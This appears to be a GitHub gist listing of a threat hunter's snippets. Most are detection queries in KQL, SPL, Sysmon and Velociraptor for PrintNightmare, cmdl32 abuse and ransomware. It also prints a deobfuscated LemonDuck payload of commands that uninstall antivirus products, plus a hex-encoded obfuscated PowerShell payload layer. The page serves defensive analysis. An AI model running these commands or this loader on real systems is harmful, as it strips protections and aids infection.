Skip to content

Instantly share code, notes, and snippets.

Avatar

thehack3r4chan

View GitHub Profile
View cmdl32_writeToExec.kql
// Straightforward and easy
DeviceProcessEvents
| join (DeviceFileEvents | where InitiatingProcessFileName has "cmdl32" | project WrittenFile=FileName, WrittenPath=FolderPath, DeviceId, SHA1) on $left.FileName==$right.WrittenFile, $left.FolderPath==$right.WrittenPath, DeviceId, SHA1
// You can swap out DeviceProcessEvents for image loads just as easy.
DeviceImageLoadEvents
| join (DeviceFileEvents | where InitiatingProcessFileName has "cmdl32" | project WrittenFile=FileName, WrittenPath=FolderPath, DeviceId, SHA1) on $left.FileName==$right.WrittenFile, $left.FolderPath==$right.WrittenPath, DeviceId, SHA1
@thehack3r4chan
thehack3r4chan / FileCreationThenLoad.kql
Last active Sep 22, 2021
actCtxKatz Detection - Defender for Endpoint
View FileCreationThenLoad.kql
// This is merley a hunting query, filter to your own environment.
// https://app.any.run/tasks/0efed476-5eca-4ee3-8ac9-32307c13ea08DeviceFileEvents
DeviceImageLoadEvents
| where isnotempty(SHA1)
| join (DeviceFileCertificateInfo | where IsSigned == false or IsTrusted == false | where not (Signer has "Google LLC") | project Signer, SHA1, IsTrusted, IsSigned) on SHA1
| join (DeviceFileEvents | where ActionType == "FileCreated" | where isnotempty(SHA1) | project-rename FileWrittenTimestamp = Timestamp | project FileWrittenTimestamp, SHA1, FolderPath, DeviceId, InitiatingProcessId, InitiatingProcessFileName) on SHA1, FolderPath, DeviceId, InitiatingProcessId, InitiatingProcessFileName
| project-rename FileWrittenAndLoaded = FolderPath1
| extend TimeDiff = datetime_diff("millisecond", Timestamp, FileWrittenTimestamp)
| where TimeDiff > 0 and TimeDiff < 50000
| project Timestamp, DeviceId, ReportId, InitiatingProcessId, InitiatingProcessFolderPath, FileWrittenAndLoaded, SHA1, TimeDiff, Signer
View PrinterNightMare_CrowdStrike.spl
// Based on https://www.reddit.com/r/crowdstrike/comments/oblzcl/20210701_cool_query_friday_printnightmare_poc/
// Query for Registry Mods
event_simpleName=ProcessRollup2
| rename FileName as PE, ImageFileName as PE_Path, TargetProcessId_decimal as ContextProcessId_decimal
| where PE=="spoolsv.exe"
| join ContextProcessId_decimal, aid
[search event_simpleName=AsepValueUpdate (RegObjectName="\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\*\\Data File" OR RegObjectName="\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\*\\Configuration File")]
| lookup local=true aid_master aid OUTPUT Version MachineDomain OU SiteName
| eval ProductType=case(ProductType = "1","Workstation", ProductType = "2","Domain Controller", ProductType = "3","Server")
| where ProductType=="Server" OR ProductType=="Domain Controller"
@thehack3r4chan
thehack3r4chan / LemonDuck.ps1
Created May 21, 2021
Deobfuscated LemonDuck payload after ProxyLogon exploitation.
View LemonDuck.ps1
cmd.exe /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
cmd.exe /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
cmd.exe /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
cmd.exe /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
cmd.exe /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
@thehack3r4chan
thehack3r4chan / Sysmonconfig.xml
Last active Mar 26, 2021
Mamba Sysmon Config
View Sysmonconfig.xml
<Sysmon schemaversion="4.50">
<!-- Hashing algorithms that can be used are md5,sha1,sha256,imphash or * for all,
more than once can be specified separated by using comas -->
<HashAlgorithms>sha256</HashAlgorithms>
<ArchiveDirectory>Sysmon</ArchiveDirectory>
<!-- Checking for signature revocation for drivers. -->
<CheckRevocation/>
<EventFiltering>
<FileCreate onmatch="include">
<TargetFilename name="" condition="contains">C:\Users\Public\</TargetFilename> <!--Looks for the file creations of all the DiskCryptor files and ransom note-->
@thehack3r4chan
thehack3r4chan / VQL
Created Feb 27, 2021
Velociraptor - ADSViewer
View VQL
name: Custom.Windows.ADSViewer
description: |
Prints the contents of an Alternate Data Stream (ADS). This will require
that both of the parameters be filled in in order to pull the data. Looking
at the ntfs table in VFS will allow you to get the target as well as the
stream.
precondition: SELECT OS From info() where OS = 'windows'
parameters:
View Layer1.ps1
# ASCII encoded hex strike delimited by '#'
$siIGk = '33#46#03#16#C7#72#72#02#E6#96#F6#A6#D2#02#37#27#16#86#34#96#96#36#37#16#42#02#D3#76#E6#96#27#47#35#96#96#36#37#16#42#B3#D7#22#F5#42#87#03#22#D5#56#47#97#26#B5#D5#27#16#86#36#B5#B7#02#47#36#56#A6#26#F4#D2#86#36#16#54#27#F6#64#C7#02#92#72#E5#72#82#47#96#C6#07#37#E2#67#D6#42#02#D3#37#27#16#86#34#96#96#36#37#16#42#B3#92#72#76#07#A6#E2#73#F6#E6#96#44#F2#47#C6#E2#16#27#56#86#F2#F2#A3#07#47#47#86#72#C2#46#F6#86#47#56#D4#A3#A3#D5#56#07#97#45#C6#C6#16#34#E2#36#96#37#16#24#C6#16#57#37#96#65#E2#47#66#F6#37#F6#27#36#96#D4#B5#C2#72#76#E6#96#27#47#72#02#B2#02#72#35#46#16#72#02#B2#02#72#F6#C6#E6#72#02#B2#02#72#77#F6#44#72#C2#97#47#47#42#82#56#D6#16#E6#97#24#C6#C6#16#34#A3#A3#D5#E6#F6#96#47#36#16#27#56#47#E6#94#E2#36#96#37#16#24#C6#16#57#37#96#65#E2#47#66#F6#37#F6#27#36#96#D4#B5#02#D3#67#D6#42#B3#92#72#36#96#37#16#24#C6#16#57#37#96#65#E2#47#66#F6#37#F6#27#36#96#D4#72#82#56#D6#16#E4#C6#16#96#47#27#16#05#86#47#96#75#46#16#F6#C4#A3#A3#D5#97#C6#26#D6#56#37#37#14#E2#E6#F6#96#4